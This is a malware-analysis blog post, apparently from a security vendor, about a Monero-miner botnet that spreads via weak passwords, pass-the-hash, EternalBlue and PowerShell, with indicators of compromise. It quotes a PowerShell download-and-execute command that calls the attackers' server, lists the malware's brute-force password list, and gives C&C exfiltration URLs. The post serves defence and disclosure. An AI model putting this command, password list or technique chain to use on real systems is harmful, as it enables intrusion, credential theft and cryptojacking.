Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse

By Augusto Remillano II and Arvin Macaraeg

We detected a malware that uses multiple propagation and infection methods to drop a Monero cryptocurrency miner onto as many systems and servers as possible. Initially observed in China in early 2019, the methods it previously used to infect networks involved accessing weak passwords and using pass-the-hash technique, Windows admin tools, and brute force attacks with publicly available codes. However, this new case we found in Japan involves the use of the EternalBlue exploit and the abuse of PowerShell to break into the system and evade detection.

It appears that the attackers are now expanding this botnet to other countries; our telemetry has since detected this threat in Australia, Taiwan, Vietnam, Hong Kong, and India.

Propagation and Behavior

The malware’s (detected by Trend Micro as Trojan.PS1.LUDICROUZ.A) primary propagation technique involves trying a list of weak credentials to log into other computers connected to the network. Instead of directly sending itself into all the systems connected, the remote command changes the firewall and port forwarding settings of the infected machines, setting up a scheduled task to download and execute an updated copy of the malware. The downloaded PowerShell script is executed with

IEX (New-Object Net.WebClient).downloadstring(‘hxxp://v.beahh[.]com/wm?hp’)

 

123456

password

PASSWORD

football

welcome

1

12

21

123

321

1234

12345

123123

123321

111111

654321

666666

121212

000000

222222

888888

1111

555555

1234567

12345678

123456789

987654321

admin

abc123

abcd1234

abcd@1234

abc@123

p@ssword

P@ssword

p@ssw0rd

P@ssw0rd

P@SSWORD

P@SSW0RD

P@$$w0rd

P@$$word

P@$$w0rd

iloveyou

monkey

login

passw0rd

master

hello

qazwsx

password1

qwerty

baseball

qwertyuiop

superman

1qaz2wsx

fuckyou

123qwe

zxcvbn

pass

aaaaaa

love

administrator

Table 1. List of weak passwords used for primary propagation.

It also uses this list with Invoke-WMIMethod (detected by Trend Micro as HackTool.Win32.Impacket.AI) to gain remote access to other machines:

Figure 1. Invoke-WMIMethod for remote access to machines with weak passwords.

The malware also uses the pass the hash method, wherein it authenticates itself to remote servers using the user’s hashed password. By using the Get-PassHashes command, the malware acquires the hashes stored in the machine, as well as the hashes of the weak passwords listed. After acquiring the hashes, the malware utilizes Invoke-SMBClient – another publicly available script – to perform file share operations using pass-the-hash.

Figure 2. Malware using pass-the-hash technique to get the hash of the user’s password and hashes of the weak passwords.

If successful, it deletes the file %Start Menu%\Programs\Startup\run.bat, likely a dropped file of an older version of the malware. It also drops the following:

  • %Application Data%\flashplayer.tmp
  • %Application Data%\sign.txt – used to indicate that the machine is already infected
  • %Start Menu%\Programs\Startup\FlashPlayer.lnk – responsible for executing the script tmp at startup

If the user has a stronger password, the malware uses EternalBlue to propagate.

Figure 3. Exploit payload.

Once a machine is infected via one of the methods, the malware acquires the MAC address and collects information on the anti-virus products installed in the machine. It downloads another obfuscated PowerShell script (detected by Trend Micro as Trojan.PS1.PCASTLE.B) from the C&C server, and analysis revealed that the download URL sends back the information it acquired earlier to its handler. The downloaded PowerShell is a dropper, responsible for downloading and executing the malware’s components, most of which are copies of itself.

Figure 4. Routine for acquiring the MAC address and AV products installed by the malware.

To check whether the malware already installed its components it looks for the following files:

  • %Temp%\kkk1.log
  • %Temp%\pp2.log
  • %Temp%\333.log
  • %Temp%\kk4.log
  • %Temp%\kk5.log

Figure 5. Checking for installed malware components.

With each $flagX representing a component, the malware downloads a newer version of the PowerShell dropper script ($flag) and installs a scheduled task to run it regularly if it is still unset. The behavior of the malware depends on the privilege it was run. $flag2 also downloads a copy of the malware from a different URL and creates a differently named scheduled task.

Figure 6. $flag and $flag2 for scheduled tasks.

The third component (detected by Trend Micro as TrojanSpy.Win32.BEAHNY.THCACAI) is a dropped Trojan — a copy of itself in a larger file size, likely to evade sandboxes — that collects system information from the host:

  • Computer Name
  • Machine’s GUID
  • MAC Address
  • OS Version
  • Graphics Memory Information
  • System Time

The fourth component is a Python-compiled binary executable that further propagates the malware, also capable of pass the hash attacks by dropping and executing a PowerShell implementation of Mimikatz (detected by Trend Micro as Trojan.PS1.MIMIKATZ.ADW).

Figure 7. Dropping the fourth executable component.

Figure 8. Checking if the Mimikatz component is already installed, and executing Mimikatz.

The malware also attempts to use weak SQL passwords to access vulnerable database servers, executing shell commands using xp_cmdshell upon access. Like the main file, the component scans IP blocks for vulnerable devices that can be exploited using EternalBlue by reusing publicly available codes related to previous exploits.

Figure 9. Scanning for vulnerable database servers.

The fifth component is an executable that is downloaded and executed. However, the download URL was offline at the time of writing.

The malware’s payload — a Monero coinminer — is also deployed by PowerShell, but is not stored in a file. Instead, it is injected into its own PowerShell process with another publicly available code, Invoke-ReflectivePEInjection. After installation, the malware reports its status to the C&C server.

Figure 10. PowerShell script that downloads and executes the miner payload.

Figure 11. Executing the miner payload.

Conclusion

We found the malware sample to be sophisticated, designed specifically to infect as many machines as possible and to operate without immediate detection. It leverages weak passwords in computer systems and databases, targets legacy software that companies may still be using, uses PowerShell-based scripts with components downloaded and executed in memory, exploits unpatched vulnerabilities, and installs using the Windows startup folder and the task scheduler. Considering the increasing popularity of PowerShell and more publicly available open-source codes, we can expect to see more complicated malware like these. And while system information being collected and sent back to the C&C may appear insignificant compared to directly stealing personally identifiable information, system information is unique to machines and may be used to trace, identify, and track users and activities.

Figure 12. Malware’s new URL.

We recommend updating systems with available patches from legitimate vendors as soon as possible. Users of legacy software should also update with virtual patches from credible sources. As of this writing, the malware is still active and was updated, connecting to a new URL. Use complicated passwords, and authorize layered authentication whenever possible. Enterprises are also advised to enable a multi-layered protection system that can actively block these threats and malicious URLs from the gateway to the endpoint.

 

Indicators of Compromise

SHA256 Detection
3f28cace99d826b3fa6ed3030ff14ba77295d47a4b6785a190b7d8bc0f337e41 Trojan.PS1.MIMIKATZ.ADW
7c402add8feffadc6f07881d201cb21bc4b39df98709917949533f6febd53b6e Trojan.PS1.LUDICROUZ.A
aaef385a090d83639fb924c679b2ff22e90ae9377774674d537670a975513397 TrojanSpy.Win32.BEAHNY.THCACAI
e28b7c8b4fc37b0ef91f32bd856dd71599acd2f2071fcba4984cc331827c0e13 Trojan.PS1.PCASTLE.B
fa0978b3d14458524bb235d6095358a27af9f2e9281be7cd0eb1a4d2123a8330 HackTool.Win32.Impacket.AI

 

URLs

hxxp://down[.]beahh[.]com/c32.dat

hxxp://down[.]beahh[.]com/new.dat?allv5

hxxp://ii[.]ackng[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}

hxxp://log[.]beahh[.]com/logging.php?ver=5p?src=wm&target

hxxp://oo[.]beahh[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}

hxxp://p[.]beahh[.]com/upgrade.php

hxxp://pp[.]abbny[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}

hxxp://v[.]beahh[.]com/wm?hp

hxxp://v[.]y6h[.]net/g?h

hxxp://v[.]y6h[.]net/g?l

lplp1[.]abbny[.]com:443

lplp1[.]ackng[.]com:443

lplp1[.]beahh[.]com:443

 

Additional insights and analysis by Carl Maverick Pascual and Patrick Angelo Roderno.

The post Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse appeared first on .

Read more: Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse

Incoming search terms

Story added 12. April 2019, content source with full text you can find at link above.